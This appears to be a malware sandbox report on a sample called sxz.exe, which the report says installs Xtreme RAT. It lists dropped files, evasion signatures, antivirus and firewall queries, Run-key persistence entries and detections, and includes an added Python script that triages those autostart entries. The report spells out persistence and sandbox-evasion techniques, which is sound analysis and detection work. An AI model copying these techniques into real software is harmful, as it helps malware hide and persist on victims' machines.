Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Found evasive API chain (date check)Show sources
Source: C:\Windows\InstallDir\Server.exeEvasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\svchost.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_5-9485
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-10192
Source: C:\Windows\InstallDir\Server.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI coverage: 8.6 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.3 %
Source: C:\Program Files\Internet Explorer\iexplore.exeAPI coverage: 2.3 %
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeAPI coverage: 9.9 %
Source: C:\Windows\InstallDir\Server.exeAPI coverage: 3.7 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\svchost.exe TID: 3692Thread sleep time: -80000s >= -60000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1716Thread sleep time: -360000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3796Thread sleep time: -120000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3828Thread sleep time: -60000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3908Thread sleep time: -180000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2624Thread sleep time: -60000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3936Thread sleep time: -180000s >= -60000s
Source: C:\Windows\explorer.exe TID: 2444Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3952Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 4016Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe TID: 2176Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2668Thread sleep time: -240000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2616Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 2380Thread sleep time: -120000s >= -60000s
Source: C:\Windows\explorer.exe TID: 1324Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2456Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2340Thread sleep time: -60000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C835B0 FindFirstFileW,CloseHandle,3_2_00C835B0
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C835B0 FindFirstFileW,CloseHandle,3_1_00C835B0
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C835B0 FindFirstFileW,CloseHandle,5_2_00C835B0
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C835B0 FindFirstFileW,CloseHandle,6_2_00C835B0
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00405FAC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00405FAC
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C835B0 FindFirstFileW,CloseHandle,15_2_00C835B0
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C835B0 FindFirstFileW,CloseHandle,15_1_00C835B0
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: server.exe, svchost.exe, iexplore.exe, explorer.exe, Server.exeBinary or memory string: trhgtehgfsgrfgtrwegtre
Source: Server.exeBinary or memory string: VBoxService.exe
Program exit points
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9809
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9813
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9827
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9967
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9801
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9966
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9820
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9821
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9847
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9815
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9818
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9790
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9337
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9934
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9791
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9795
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9779
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9824
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node | graph_3-9825
Source: C:\Windows\System32\svchost.exe | API call chain: ExitProcess graph end node | graph_5-9449
Source: C:\Program Files\Internet Explorer\iexplore.exe | API call chain: ExitProcess graph end node | graph_6-9697
Source: C:\Program Files\Internet Explorer\iexplore.exe | API call chain: ExitProcess graph end node | graph_6-9696
Source: C:\Program Files\Internet Explorer\iexplore.exe | API call chain: ExitProcess graph end node | graph_6-9664
Source: C:\Windows\InstallDir\Server.exe | API call chain: ExitProcess graph end node

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00447930 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,12_2_00447930
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0045C73C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,12_2_0045C73C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0045CE6C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,12_2_0045CE6C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0045CF30 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,12_2_0045CF30
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0041DD98 IsIconic,GetWindowPlacement,GetWindowRect,12_2_0041DD98
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00448300 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,12_2_00448300
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00459200 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,12_2_00459200
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00447028 IsIconic,GetCapture,12_2_00447028
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C87E20 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00C87E20
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\sxz.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\cscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\cscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_00406170
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: GetLocaleInfoA,12_2_0040BCFC
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: GetLocaleInfoA,12_2_0040BCB0
Queries the installation date of Windows
Source: C:\Windows\System32\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Queries volume information: C:\ VolumeInformation
Queries time zone information
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation DynamicDaylightTimeDisabled
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C89790 GetLocalTime,GetDateFormatW,GetTimeFormatW,3_2_00C89790
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8854C GetUserNameA,3_2_00C8854C
Contains functionality to query windows version
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_004855D0 GetVersion,12_2_004855D0
Queries the cryptographic machine GUID
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 546427 | Sample: sxz.exe | Startdate: 03/05/2018 | Architecture: WINDOWS | Score: 100
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for submitted file; Multi AV Scanner detection for dropped file; 9 other signatures. Notable child-process signatures: Installs Xtreme RAT; Exploit detected, runtime environment starts unknown processes.
[Behavior graph image not reproduced; node and edge text omitted.]

Simulations

Behavior and APIs

Time | Type | Description
10:11:35 | API Interceptor | 2x Sleep call for process: sxz.exe modified
10:11:46 | API Interceptor | 10x Sleep call for process: svchost.exe modified
10:11:47 | API Interceptor | 1x Sleep call for process: javaw.exe modified
10:11:48 | API Interceptor | 1666x Sleep call for process: explorer.exe modified
10:11:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sxz.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
10:11:49 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU C:\Windows\InstallDir\Server.exe
10:11:50 | API Interceptor | 1x Sleep call for process: server.exe modified
10:11:50 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKLM C:\Windows\InstallDir\Server.exe
10:11:58 | API Interceptor | 28x Sleep call for process: 358saxio.exe modified
10:12:02 | API Interceptor | 1x Sleep call for process: java.exe modified
10:12:07 | API Interceptor | 11x Sleep call for process: cscript.exe modified
10:12:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
10:12:30 | API Interceptor | 1x Sleep call for process: Server.exe modified
10:13:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sVCHXnbVdLZ "C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe" -jar "C:\Users\user\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik"
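A triage pass over the Autostart rows above, as an added example (it is not part of the Joe Sandbox report and not code from the sandbox or the sample). It parses the five Run entries, normalises the mixed-separator paths, and flags what a responder would want called out: images under a user profile's AppData, an image in a non-standard directory below C:\Windows, value names that mimic a registry hive name, the same image registered more than once, and javaw.exe launched with a -jar payload whose extension is not .jar. The rows in EVENTS are copied from the table; every heuristic is this example's own assumption, not a sandbox signature.

```python
"""Triage of the Autostart rows in the Behavior and APIs table above.

Added example, not Joe Sandbox code. EVENTS holds constructed copies of the
report's five Autostart rows. The heuristics in image_reasons() are this
example's own assumptions about what makes a Run value worth a second look.
"""
import re
from collections import Counter
from pathlib import PureWindowsPath

# Constructed from the report's Autostart rows: time, registry key, value name, command line.
EVENTS = [
    r"10:11:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sxz.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe",
    r"10:11:49 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU C:\Windows\InstallDir\Server.exe",
    r"10:11:50 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKLM C:\Windows\InstallDir\Server.exe",
    r"10:12:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe",
    r'10:13:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sVCHXnbVdLZ "C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe" -jar "C:\Users\user\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik"',
]

# Row layout: <time> <sep> Autostart <sep> Run: <key> <value name> <command line>
_ROW = re.compile(r"^(?P<time>\S+)[\s|]+Autostart[\s|]+Run:\s+(?P<key>\S+)\s+(?P<value>\S+)\s+(?P<command>.+)$")
_JAR = re.compile(r'-jar\s+(?:"([^"]+)"|(\S+))')
HIVE_NAMES = {"HKCU", "HKLM", "HKEY_CURRENT_USER", "HKEY_LOCAL_MACHINE"}


def split_command(command):
    """Return (image path, remaining arguments) for a Run value's command line."""
    command = command.strip()
    if command.startswith('"'):
        end = command.index('"', 1)
        return command[1:end], command[end + 1:].strip()
    image, _, args = command.partition(" ")
    return image, args.strip()


def image_reasons(image, args):
    """Heuristics (this example's own) that make an autostart image suspicious."""
    reasons = []
    path = PureWindowsPath(image)            # tolerates the mixed / and \ separators
    parts = [p.lower() for p in path.parts]
    if "appdata" in parts:
        reasons.append("image lives under a user AppData directory")
    elif parts[:2] == ["c:\\", "windows"] and not {"system32", "syswow64"} & set(parts):
        reasons.append("image in a non-standard subdirectory of C:\\Windows")
    if "/" in image and "\\" in image:
        reasons.append("mixed path separators in the registry value")
    if path.name.lower() in ("javaw.exe", "java.exe"):
        m = _JAR.search(args)
        if m:
            payload = PureWindowsPath(m.group(1) or m.group(2))
            if payload.suffix.lower() != ".jar":
                reasons.append(f"java started with a -jar payload not named .jar ({payload.name})")
    return reasons


def triage(lines):
    """Parse Autostart rows; each finding carries the normalised image path and its reasons."""
    findings = []
    for line in lines:
        m = _ROW.match(line)
        if not m:
            continue                          # not an Autostart row (e.g. an API Interceptor line)
        image, args = split_command(m["command"])
        reasons = image_reasons(image, args)
        if m["value"].upper() in HIVE_NAMES:
            reasons.append("value name mimics a registry hive name")
        findings.append({"time": m["time"], "key": m["key"], "value": m["value"],
                         "image": str(PureWindowsPath(image)), "reasons": reasons})
    return findings


def registrations_per_image(findings):
    """Autostart rows per image: more than one is the 'multiple autostart registry keys' pattern."""
    return Counter(f["image"] for f in findings)


if __name__ == "__main__":
    findings = triage(EVENTS)
    for f in findings:
        print(f"{f['time']} {f['key']}\\{f['value']} -> {f['image']}")
        for r in f["reasons"]:
            print("    -", r)
    print(registrations_per_image(findings))
```

The same parser accepts the API Interceptor rows and skips them, so the whole table can be fed in unchanged. PureWindowsPath is used deliberately: it folds the forward slashes the sample wrote into its own Run values, so the two Skype.exe registrations collapse onto one image and the duplicate-registration count is correct.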

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label
sxz.exe | 43% | virustotal |
sxz.exe | 100% | Avira | DR/Delphi.wqtni

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user~1\AppData\Local\Temp\358saxio.exe | 100% | Avira | DR/Delphi.svunx
C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs | 100% | Avira | VBS/Agent.281
C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs | 100% | Avira | VBS/Agent.276
C:\Users\user\AppData\Roaming\Microsoft\Skype.exe | 100% | Avira | DR/Delphi.svunx
C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs | 100% | Avira | VBS/Agent.281
C:\Users\user~1\AppData\Local\Temp\server.exe | 100% | Avira | TR/Spy.59904216
C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs | 100% | Avira | VBS/Agent.276
C:\Users\user~1\AppData\Local\Temp\358saxio.exe | 48% | virustotal |

Unpacked PE Files

Source | Detection | Scanner | Label
19.1.358saxio.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.358saxio.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
27.1.Server.exe.c80000.0.unpack | 100% | Avira | TR/Spy.59904216
5.2.svchost.exe.c80000.6.unpack | 100% | Avira | TR/Spy.59904216
3.2.server.exe.c80000.1.unpack | 100% | Avira | TR/Spy.59904216
15.0.Server.exe.c80000.0.unpack | 100% | Avira | TR/Spy.59904216
2.1.sxz.exe.400000.0.unpack | 100% | Avira | DR/Injector.toian
35.2.358saxio.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
27.2.Server.exe.c80000.1.unpack | 100% | Avira | TR/Spy.59904216
15.0.Server.exe.c80000.1.unpack | 100% | Avira | TR/Spy.59904216
19.0.358saxio.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.server.exe.c80000.2.unpack | 100% | Avira | TR/Spy.59904216
35.0.358saxio.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.2.iexplore.exe.c80000.2.unpack | 100% | Avira | TR/Spy.59904216
35.1.358saxio.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.0.358saxio.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
6.0.iexplore.exe.c80000.0.unpack | 100% | Avira | TR/Spy.59904216
12.2.358saxio.exe.23c0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.sxz.exe.400000.1.unpack | 100% | Avira | DR/Injector.toian
19.2.358saxio.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
14.1.explorer.exe.1b80000.0.unpack | 100% | Avira | TR/Spy.59904216
1.2.sxz.exe.1a40000.3.unpack | 100% | Avira | DR/Injector.toian
35.2.358saxio.exe.1440000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.0.server.exe.c80000.0.unpack | 100% | Avira | TR/Spy.59904216
15.1.Server.exe.c80000.0.unpack | 100% | Avira | TR/Spy.59904216
1.0.sxz.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
14.1.explorer.exe.1b80000.1.unpack | 100% | Avira | TR/Spy.59904216
35.0.358saxio.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
27.0.Server.exe.c80000.1.unpack | 100% | Avira | TR/Spy.59904216
5.0.svchost.exe.c80000.0.unpack | 100% | Avira | TR/Spy.59904216
27.0.Server.exe.c80000.0.unpack | 100% | Avira | TR/Spy.59904216
15.0.Server.exe.c80000.2.unpack | 100% | Avira | TR/Spy.59904216
2.2.sxz.exe.400000.2.unpack | 100% | Avira | DR/Injector.toian
19.0.358saxio.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.Server.exe.c80000.1.unpack | 100% | Avira | TR/Spy.59904216
12.2.358saxio.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.358saxio.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.sxz.exe.400000.3.unpack | 100% | Avira | DR/Injector.toian
2.0.sxz.exe.400000.2.unpack | 100% | Avira | DR/Injector.toian
34.0.iexplore.exe.c80000.0.unpack | 100% | Avira | TR/Spy.59904216
15.0.Server.exe.c80000.3.unpack | 100% | Avira | TR/Spy.59904216
3.0.server.exe.c80000.3.unpack | 100% | Avira | TR/Spy.59904216
34.2.iexplore.exe.c80000.2.unpack | 100% | Avira | TR/Spy.59904216
27.0.Server.exe.c80000.3.unpack | 100% | Avira | TR/Spy.59904216
3.0.server.exe.c80000.1.unpack | 100% | Avira | TR/Spy.59904216
2.0.sxz.exe.400000.5.unpack | 100% | Avira | DR/Injector.toian
5.2.svchost.exe.290000.1.unpack | 100% | Avira | TR/Spy.59904216
1.2.sxz.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.358saxio.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
27.0.Server.exe.c80000.2.unpack | 100% | Avira | TR/Spy.59904216
12.0.358saxio.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.1.server.exe.c80000.0.unpack | 100% | Avira | TR/Spy.59904216
35.0.358saxio.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.sxz.exe.400000.4.unpack | 100% | Avira | DR/Injector.toian
19.0.358saxio.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
